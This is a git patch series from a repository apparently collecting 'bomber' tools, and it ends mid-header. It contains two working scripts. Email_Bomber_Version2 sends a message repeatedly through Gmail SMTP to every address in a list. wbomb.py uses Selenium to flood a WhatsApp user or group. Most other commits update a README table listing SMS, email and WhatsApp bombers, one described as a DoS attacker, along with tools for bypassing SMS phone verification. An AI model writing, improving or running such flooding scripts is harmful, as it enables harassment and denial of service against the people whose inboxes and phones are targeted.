Email_Bomber_Version2 | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 Email_Bomber_Version2 diff --git a/Email_Bomber_Version2 b/Email_Bomber_Version2 new file mode 100644 index 0000000..5555933 --- /dev/null +++ b/Email_Bomber_Version2 @@ -0,0 +1,33 @@ +import smtplib +import time +print ("\033[1;31m_________ __ __ ____ ________ __ \033[1;m") +print ("\033[1;34m|########| |##\ /##| /####\ |########| |##| By @everydaycodings \033[1;m") +print ("\033[1;34m|##|____ |###\ __ /###| /##/\##\ |##| |##| Made with code \033[1;m") +print ("\033[1;34m|########| |##| |##| |##| /########\ |##| |##| ____ __ ____ __ ___ \033[1;m") +print ("\033[1;31m|##|_____ |##| |##| /##/ \##\ __|##|__ |##|_______ |__| | | |\/| |__| |__ |__| \033[1;m") +print ("\033[1;31m|########| |##| |##| /##/ \##\ |########| |##########| _|__| |__| | | _|__| |__ | \ \033[1;m") + +files = open('email.txt', 'r') +bomb_emails = files.readlines() + + +email = input("Enter your gmail_address:") +password = input("Enter your gmail_password:") +message = input("Enter Message:") +message_relode = int(input("How many message you want to send?:")) + + +for bomb_email in bomb_emails: + for x in range(0, message_relode): + mail = smtplib.SMTP('smtp.gmail.com',587) + mail.ehlo() + mail.starttls() + mail.login(email,password) + mail.sendmail(email,bomb_email,message) + print("message sent to {}".format(bomb_email)) + time.sleep(1) + +mail.close() +files.close() + +print("Done") From 3fd2ce2ebecfb186f15396ae7926637ce743674a Mon Sep 17 00:00:00 2001 From: Kumar Saksham Date: Tue, 4 May 2021 15:40:07 +0530 Subject: [PATCH 33/58] Rename Email_Bomber_Version2 to Email_Bomber_Version2.py --- Email_Bomber_Version2 => Email_Bomber_Version2.py | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename Email_Bomber_Version2 => Email_Bomber_Version2.py (100%) diff --git a/Email_Bomber_Version2 b/Email_Bomber_Version2.py similarity index 100% rename from Email_Bomber_Version2 rename to Email_Bomber_Version2.py From 39c7e2925633665651940c27e6427ecdd6f14ab5 Mon Sep 17 00:00:00 2001 From: Kumar Saksham Date: Mon, 10 May 2021 11:11:06 +0530 Subject: [PATCH 34/58] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index c2975a4..7078b77 100644 --- a/README.md +++ b/README.md @@ -41,6 +41,7 @@ |7.| Email-Spammer | Email Bomber. | Juniorn1003|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |8.| Email-Bomber |Email Bomber.|mohinparamasivam|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |9.| Fast Mail Bomber |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. | juzeon|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### Whats-app Bombers :calling: :boom: | Sr.No. | Name | Description | Developed By | Status | From 0f486220802bcc774064378f9d8e6831cbb388ed Mon Sep 17 00:00:00 2001 From: Kumar Saksham Date: Mon, 10 May 2021 11:13:25 +0530 Subject: [PATCH 35/58] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7078b77..abcb514 100644 --- a/README.md +++ b/README.md @@ -41,7 +41,7 @@ |7.| Email-Spammer | Email Bomber. | Juniorn1003|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |8.| Email-Bomber |Email Bomber.|mohinparamasivam|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |9.| Fast Mail Bomber |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. | juzeon|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### Whats-app Bombers :calling: :boom: | Sr.No. | Name | Description | Developed By | Status | From f2229b65f62e5aeba47f9c6822be8a75f115be53 Mon Sep 17 00:00:00 2001 From: Kumar Saksham Date: Mon, 10 May 2021 11:14:39 +0530 Subject: [PATCH 36/58] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index abcb514..0416af5 100644 --- a/README.md +++ b/README.md @@ -81,6 +81,7 @@ To keep this collection up-to-date need contributors who can add more mobile/ema |:octocat: [timofey260](https://github.com/timofey260)| |:octocat: [juzeon](https://github.com/juzeon)| |:octocat: [Ghost](https://github.com/ghost)| +|:octocat: [everydaycodings](https://github.com/everydaycodings)| ## Note: From 61fece5725bc856d00ca5175d008696516a22413 Mon Sep 17 00:00:00 2001 From: Kumar Saksham Date: Mon, 10 May 2021 11:29:59 +0530 Subject: [PATCH 37/58] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0416af5..c5d641c 100644 --- a/README.md +++ b/README.md @@ -41,7 +41,7 @@ |7.| Email-Spammer | Email Bomber. | Juniorn1003|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |8.| Email-Bomber |Email Bomber.|mohinparamasivam|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |9.| Fast Mail Bomber |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. | juzeon|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### Whats-app Bombers :calling: :boom: | Sr.No. | Name | Description | Developed By | Status | From 4c3a2ab7cb894352dde41c2b1d0ae2e70eefca89 Mon Sep 17 00:00:00 2001 From: Kumar Saksham Date: Tue, 11 May 2021 09:48:26 +0530 Subject: [PATCH 38/58] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c5d641c..0c90062 100644 --- a/README.md +++ b/README.md @@ -41,7 +41,7 @@ |7.| Email-Spammer | Email Bomber. | Juniorn1003|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |8.| Email-Bomber |Email Bomber.|mohinparamasivam|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |9.| Fast Mail Bomber |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. | juzeon|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### Whats-app Bombers :calling: :boom: | Sr.No. | Name | Description | Developed By | Status | From 2b0ae42efeb22bde2f531bebc37389add15ca24a Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Tue, 11 May 2021 09:59:13 +0530 Subject: [PATCH 39/58] Update readme SMS spamming using email address -- | -- This repository doesn't exist Please remove this !! And | XLR8_BOMBER -- | -- This is working It also sends OTP in WhatsApp ! --- README.md | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/README.md b/README.md index 0c90062..05157e9 100644 --- a/README.md +++ b/README.md @@ -19,15 +19,14 @@ |6.| SpamSms |Spamming mobile number with OTP.|KANG-NEWBIE|![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| |7.| C-SpamMasal |Spamming mobile number with OTP. |KANG-NEWBIE|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | |8.| SMS-BOMBER |SMS Bomber.|jdleo|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|9.| SMS spamming using email address | SMS using email. | metachar|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|10.| TBomb |SMS Bomber(Ubuntu/termux) | TheSpeedX|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|11.| smsBomb |SMS Bomber.| shellvon|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|12.| sms-bomber| SMS Bomber. |aarnhub|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|13.| Reborn SMS Bomber For Termux and Linux|Reborn SMS Bomber. |4nat|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|14.| ni_bomber |SMS Bomber |Nikait|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|15.| YetAnotherSMSBomber|Sms Bomber.|AvinashReddy3108|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|16.| smsbomb|Sms Bomber.|1d8|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|17.| XLR8_BOMBER|Superfast SMS bomber for linux and termux. |anubhavanonymous |![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|9.| TBomb |SMS Bomber(Ubuntu/termux) | TheSpeedX|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|10.| smsBomb |SMS Bomber.| shellvon|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|11.| sms-bomber| SMS Bomber. |aarnhub|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|12.| Reborn SMS Bomber For Termux and Linux|Reborn SMS Bomber. |4nat|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|13.| ni_bomber |SMS Bomber |Nikait|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|14.| YetAnotherSMSBomber|Sms Bomber.|AvinashReddy3108|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|15.| smsbomb|Sms Bomber.|1d8|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | +|16.| XLR8_BOMBER|Superfast SMS bomber for linux and termux, Also sends OTP to whatsapp. |anubhavanonymous |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### EMAIL BOMBERS :e-mail: :boom: | Sr.No. | Name | Description | Developed By | Status | From bde3d93eb11501374aeb448bf1219780de2ea515 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Tue, 11 May 2021 10:03:33 +0530 Subject: [PATCH 40/58] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 05157e9..c1f1d37 100644 --- a/README.md +++ b/README.md @@ -61,7 +61,7 @@ |1.| https://mailspammer.cf | Email Spammer Website. Spam piles and piles of emails! |[WOLFIE_OG](https://github.com/WOLFIE-OG)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |2.| HPomb|HPomb Call, SMS and mail bomber all in one. |[HoneyPots0](https://github.com/HoneyPots0)|![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| |3.| bomberthon |Best Bombing Tool with WhatsApp, Instagram, SMS bomber | [b31ngD3v](https://github.com/b31ngD3v)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| -|4.| PySpam | Spam for pc {not work ok phone} | [timofey260](https://github.com/timofey260)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| +|4.| PySpam | Spam for pc {not work on phone} | [timofey260](https://github.com/timofey260)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| ## Contributors: From 2166bccf7c1317be46cee48d552d1fabf8a9c4c8 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Tue, 11 May 2021 10:15:06 +0530 Subject: [PATCH 41/58] Update README.md --- README.md | 25 ++++++++++--------------- 1 file changed, 10 insertions(+), 15 deletions(-) diff --git a/README.md b/README.md index c1f1d37..57392ad 100644 --- a/README.md +++ b/README.md @@ -66,21 +66,16 @@ ## Contributors: -To keep this collection up-to-date need contributors who can add more mobile/email/whatsapp/twitter scripts and github repo here at one place. -| Contributors | -|--------------| -|:octocat: [iMro0t](https://github.com/iMro0t)| -|:octocat: [rizwansoaib](https://github.com/rizwansoaib)| -|:octocat: [scienceLabwork](https://github.com/scienceLabwork)| -|:octocat: [cclauss](https://github.com/cclauss)| -|:octocat: [rduttshukla](https://github.com/rduttshukla)| -|:octocat: [LucasNcipha](https://github.com/LucasNcipha)| -|:octocat: [akshaykalucha3](https://github.com/akshaykalucha3)| -|:octocat: [xyzricky](https://github.com/xyzricky)| -|:octocat: [timofey260](https://github.com/timofey260)| -|:octocat: [juzeon](https://github.com/juzeon)| -|:octocat: [Ghost](https://github.com/ghost)| -|:octocat: [everydaycodings](https://github.com/everydaycodings)| +To keep this collection up-to-date need contributors who can add more mobile/email/whatsapp/twitter scripts and github repo here at one place. +||| +|--------------|----------| +|:octocat: [iMro0t](https://github.com/iMro0t)|:octocat: [akshaykalucha3](https://github.com/akshaykalucha3)| +|:octocat: [rizwansoaib](https://github.com/rizwansoaib)|:octocat: [xyzricky](https://github.com/xyzricky)| +|:octocat: [scienceLabwork](https://github.com/scienceLabwork)|:octocat: [timofey260](https://github.com/timofey260)| +|:octocat: [cclauss](https://github.com/cclauss)|:octocat: [juzeon](https://github.com/juzeon)| +|:octocat: [rduttshukla](https://github.com/rduttshukla)|:octocat: [Ghost](https://github.com/ghost)| +|:octocat: [LucasNcipha](https://github.com/LucasNcipha)|:octocat: [everydaycodings](https://github.com/everydaycodings)| + ## Note: From 9bb099d9102171b45bb82645aad4825003d6cbf2 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Fri, 14 May 2021 19:32:42 +0530 Subject: [PATCH 42/58] Update README.md --- README.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 57392ad..703d23b 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,5 @@ # :boom::bomb::bomb::bomb: BOMBERs :bomb::bomb::bomb::boom: -𝕊𝕄𝕊/𝔼𝕞𝕒𝕚𝕝/𝕨𝕙𝕒𝕥𝕤𝕒𝕡𝕡/Twitter/Instagram 𝔹𝕠𝕞𝕓𝕖𝕣𝕤 ℂ𝕠𝕝𝕝𝕖𝕔𝕥𝕚𝕠𝕟. ♡ +SMS/Email/Whatsapp/Twitter/Instagram 𝔹𝕠𝕞𝕓𝕖𝕣𝕤 ℂ𝕠𝕝𝕝𝕖𝕔𝕥𝕚𝕠𝕟. ♡ Also added collection of some Fake SMS utilities which helps in skip phone number based SMS verification by using a temporary phone number that acts like a proxy. | Status | Description | Color Code | |--------|-------------|------------| @@ -63,6 +63,12 @@ |3.| bomberthon |Best Bombing Tool with WhatsApp, Instagram, SMS bomber | [b31ngD3v](https://github.com/b31ngD3v)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| |4.| PySpam | Spam for pc {not work on phone} | [timofey260](https://github.com/timofey260)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| +### TEMP & Fake-SMS Collection: +| Sr.No. | Name | Description | Developed By | Status | +|--------|------|--------------|-------------|--------| +|1.| tmpsms| A temporary SMS utility right from your terminal written in POSIX sh. |[sdushantha](https://github.com/sdushantha)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|2.| fake-sms| A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy. |[Narasimha1997](https://github.com/Narasimha1997)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | + ## Contributors: From b7bbe281dd0357d9fbb42feb70bf897ae83b5fc9 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Fri, 14 May 2021 19:39:14 +0530 Subject: [PATCH 43/58] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 703d23b..e128adc 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,5 @@ # :boom::bomb::bomb::bomb: BOMBERs :bomb::bomb::bomb::boom: -SMS/Email/Whatsapp/Twitter/Instagram 𝔹𝕠𝕞𝕓𝕖𝕣𝕤 ℂ𝕠𝕝𝕝𝕖𝕔𝕥𝕚𝕠𝕟. ♡ Also added collection of some Fake SMS utilities which helps in skip phone number based SMS verification by using a temporary phone number that acts like a proxy. +***SMS/Email/Whatsapp/Twitter/Instagram 𝔹𝕠𝕞𝕓𝕖𝕣𝕤 ℂ𝕠𝕝𝕝𝕖𝕔𝕥𝕚𝕠𝕟. ♡ Also added collection of some Fake SMS utilities which helps in skip phone number based SMS verification by using a temporary phone number that acts like a proxy.*** | Status | Description | Color Code | |--------|-------------|------------| From 8d735c50026bd197a0600c60dfa3c7ee3a1be7d4 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Sat, 11 Sep 2021 11:16:09 +0530 Subject: [PATCH 44/58] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e128adc..ba5e0df 100644 --- a/README.md +++ b/README.md @@ -23,8 +23,8 @@ |10.| smsBomb |SMS Bomber.| shellvon|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | |11.| sms-bomber| SMS Bomber. |aarnhub|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | |12.| Reborn SMS Bomber For Termux and Linux|Reborn SMS Bomber. |4nat|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|13.| ni_bomber |SMS Bomber |Nikait|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | -|14.| YetAnotherSMSBomber|Sms Bomber.|AvinashReddy3108|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|13.| ni_bomber |SMS Bomber |Nikait|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) | +|14.| YetAnotherSMSBomber|Sms Bomber.|AvinashReddy3108|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) | |15.| smsbomb|Sms Bomber.|1d8|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | |16.| XLR8_BOMBER|Superfast SMS bomber for linux and termux, Also sends OTP to whatsapp. |anubhavanonymous |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | From 1bddda2212f6cc48a7ede786617476cb63ce0ced Mon Sep 17 00:00:00 2001 From: getPoland <36799117+getPoland@users.noreply.github.com> Date: Tue, 5 Oct 2021 19:31:51 +0200 Subject: [PATCH 45/58] Fixed the xpath Fixed the xpath of message.box & button.send --- wbomb.py | 47 ++++++++++++++++++++++++++--------------------- 1 file changed, 26 insertions(+), 21 deletions(-) diff --git a/wbomb.py b/wbomb.py index fac67f1..da32c82 100644 --- a/wbomb.py +++ b/wbomb.py @@ -1,36 +1,41 @@ from selenium import webdriver import os -from webdriver_manager.chrome import ChromeDriverManager #1st changer +from webdriver_manager.chrome import ChromeDriverManager # 1st changer + + def banner(): - print(''' + print(''' ## ## ======= #### #### #### ======= \ \ #### / / # # ## ## / /\ \ / /\ \ # # \ \ / /\ \ / / #====== ## ## / / \ \/ / \ \ #====== \ \/ / \ \/ / # # ## ## / / #### \ \ # # #### #### ======= #### ## ## ======= ''') + + def main(): - driver = webdriver.Chrome(ChromeDriverManager().install()) #2nd change - driver.get('https://web.whatsapp.com/') + driver = webdriver.Chrome(ChromeDriverManager().install()) # 2nd change + driver.get('https://web.whatsapp.com/') - name = input('Enter the name of user or group: ') - msg = input('Enter your message: ') - count = int(input('Enter the count: ')) + name = input('Enter the name of user or group: ') + msg = input('Enter your message: ') + count = int(input('Enter the count: ')) - input('Enter any key after scanning QR code') + input('Enter any key after scanning QR code') + + user = driver.find_element_by_xpath('//span[@title = "{}"]'.format(name)) + user.click() + + # The classname of message box may vary. + msg_box = driver.find_element_by_xpath('/html/body/div[1]/div[1]/div[1]/div[4]/div[1]/footer/div[1]/div/div/div[2]/div[1]/div/div[2]') + + for i in range(count): + msg_box.send_keys(msg) + # The classname of send button may vary. + button = driver.find_element_by_xpath('/html/body/div[1]/div[1]/div[1]/div[4]/div[1]/footer/div[1]/div/div/div[2]/div[2]/button') + button.click() + print('Bombing Complete!!') - user = driver.find_element_by_xpath('//span[@title = "{}"]'.format(name)) - user.click() - - # The classname of message box may vary. - msg_box = driver.find_element_by_xpath('//*[@id="main"]/footer/div[1]/div[2]/div/div[2]') - - for i in range(count): - msg_box.send_keys(msg) - # The classname of send button may vary. - button = driver.find_element_by_xpath('//*[@id="main"]/footer/div[1]/div[3]/button') - button.click() - print('Bombing Complete!!') banner() -main() \ No newline at end of file +main() From c7ff01024d903aa8084e8c97766b5c73b401ba49 Mon Sep 17 00:00:00 2001 From: Zeyad Mansour <45726273+zeyad-mansour@users.noreply.github.com> Date: Fri, 8 Oct 2021 18:48:53 -0400 Subject: [PATCH 46/58] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index ba5e0df..e4f94b2 100644 --- a/README.md +++ b/README.md @@ -41,6 +41,7 @@ |8.| Email-Bomber |Email Bomber.|mohinparamasivam|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |9.| Fast Mail Bomber |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. | juzeon|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |10.| Email_Bomber_Version2 |Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails To multiple Victims(Improved Version). | everydaycodings|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|11.| Atomic Email Bomb | A better Gmail bomber. | zeyad-mansour|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### Whats-app Bombers :calling: :boom: | Sr.No. | Name | Description | Developed By | Status | From f0b532284bf108fd575e1078fbaaa6bc123b4980 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Sat, 6 Nov 2021 11:14:20 +0530 Subject: [PATCH 47/58] Update README.md --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index e4f94b2..0cdd185 100644 --- a/README.md +++ b/README.md @@ -81,7 +81,8 @@ To keep this collection up-to-date need contributors who can add more mobile/ema |:octocat: [scienceLabwork](https://github.com/scienceLabwork)|:octocat: [timofey260](https://github.com/timofey260)| |:octocat: [cclauss](https://github.com/cclauss)|:octocat: [juzeon](https://github.com/juzeon)| |:octocat: [rduttshukla](https://github.com/rduttshukla)|:octocat: [Ghost](https://github.com/ghost)| -|:octocat: [LucasNcipha](https://github.com/LucasNcipha)|:octocat: [everydaycodings](https://github.com/everydaycodings)| +|:octocat: [LucasNcipha](https://github.com/LucasNcipha)|:octocat: [everydaycodings](https://github.com/everydaycodings)| +|:octocat: [zeyad-mansour](https://github.com/zeyad-mansour)| | ## Note: From 7b8b184935f62f2f551d6f64eac5f1ceb19d9b46 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Sat, 6 Nov 2021 11:18:17 +0530 Subject: [PATCH 48/58] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0cdd185..097790e 100644 --- a/README.md +++ b/README.md @@ -46,7 +46,7 @@ ### Whats-app Bombers :calling: :boom: | Sr.No. | Name | Description | Developed By | Status | |--------|------|--------------|-------------|--------| -|1.| wbomb.py| Whatsapp-bomber sending multipal message to a single user.|bhattsameer|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| +|1.| wbomb.py| Whatsapp-bomber sending multipal message to a single user.|bhattsameer Last Modified: [getPoland](https://github.com/getPoland)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| |2.| whatabomb | Whats-app bomber GUI. | [tbhaxor](https://github.com/tbhaxor)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |3.| WhatsApp-Bomber | WhatsApp Monitor+Bomber (Chrome Extension)| [rizwansoaib](https://github.com/rizwansoaib)|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+)| |4.| WhatsApp-Spam | WhatsApp-Spam scripts | [macr1408](https://github.com/macr1408)|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | From c862289e2e86639fe15328c151c91212e66ec034 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Sun, 9 Jan 2022 19:38:33 +0530 Subject: [PATCH 49/58] Update status of one tool https://mailspammer.cf not working, Modified Status. --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 097790e..95c0485 100644 --- a/README.md +++ b/README.md @@ -59,7 +59,7 @@ ### Others: | Sr.No. | Name | Description | Developed By | Status | |--------|------|--------------|-------------|--------| -|1.| https://mailspammer.cf | Email Spammer Website. Spam piles and piles of emails! |[WOLFIE_OG](https://github.com/WOLFIE-OG)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|1.| https://mailspammer.cf | Email Spammer Website. Spam piles and piles of emails! |[WOLFIE_OG](https://github.com/WOLFIE-OG)|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) | |2.| HPomb|HPomb Call, SMS and mail bomber all in one. |[HoneyPots0](https://github.com/HoneyPots0)|![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| |3.| bomberthon |Best Bombing Tool with WhatsApp, Instagram, SMS bomber | [b31ngD3v](https://github.com/b31ngD3v)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| |4.| PySpam | Spam for pc {not work on phone} | [timofey260](https://github.com/timofey260)|![Working](https://via.placeholder.com/15/c5f015/000000?text=+)| From 54e9b5a99f10520a34e70cb5e4bc375fb9281904 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Sun, 9 Jan 2022 19:42:11 +0530 Subject: [PATCH 50/58] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 95c0485..280a5f8 100644 --- a/README.md +++ b/README.md @@ -19,7 +19,7 @@ |6.| SpamSms |Spamming mobile number with OTP.|KANG-NEWBIE|![Others](https://via.placeholder.com/15/1589F0/000000?text=+)| |7.| C-SpamMasal |Spamming mobile number with OTP. |KANG-NEWBIE|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | |8.| SMS-BOMBER |SMS Bomber.|jdleo|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | -|9.| TBomb |SMS Bomber(Ubuntu/termux) | TheSpeedX|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|9.| TBomb |A free and open-source SMS/Call bombing application | TheSpeedX|![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | |10.| smsBomb |SMS Bomber.| shellvon|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | |11.| sms-bomber| SMS Bomber. |aarnhub|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | |12.| Reborn SMS Bomber For Termux and Linux|Reborn SMS Bomber. |4nat|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | From 979fa2ed92eef4b5585ce9ccd5435b7b5a254ff3 Mon Sep 17 00:00:00 2001 From: Eban'ko <80776324+ebankoff@users.noreply.github.com> Date: Sun, 16 Jan 2022 01:08:14 +0300 Subject: [PATCH 51/58] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 280a5f8..cadb968 100644 --- a/README.md +++ b/README.md @@ -27,6 +27,7 @@ |14.| YetAnotherSMSBomber|Sms Bomber.|AvinashReddy3108|![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) | |15.| smsbomb|Sms Bomber.|1d8|![Others](https://via.placeholder.com/15/1589F0/000000?text=+) | |16.| XLR8_BOMBER|Superfast SMS bomber for linux and termux, Also sends OTP to whatsapp. |anubhavanonymous |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | +|17.| BoMbEr|SMS, email, WhatsApp, Telegram, Discord bomber and DoS attacker|ebankoff |![Working](https://via.placeholder.com/15/c5f015/000000?text=+) | ### EMAIL BOMBERS :e-mail: :boom: | Sr.No. | Name | Description | Developed By | Status | @@ -82,8 +83,7 @@ To keep this collection up-to-date need contributors who can add more mobile/ema |:octocat: [cclauss](https://github.com/cclauss)|:octocat: [juzeon](https://github.com/juzeon)| |:octocat: [rduttshukla](https://github.com/rduttshukla)|:octocat: [Ghost](https://github.com/ghost)| |:octocat: [LucasNcipha](https://github.com/LucasNcipha)|:octocat: [everydaycodings](https://github.com/everydaycodings)| -|:octocat: [zeyad-mansour](https://github.com/zeyad-mansour)| | - +|:octocat: [zeyad-mansour](https://github.com/zeyad-mansour)|:octocat: [ebankoff](https://github.com/ebankoff)| ## Note: From 852faba0d076a4ab525e1fa1ea8500a55fac4e29 Mon Sep 17 00:00:00 2001 From: github348 Date: Fri, 4 Feb 2022 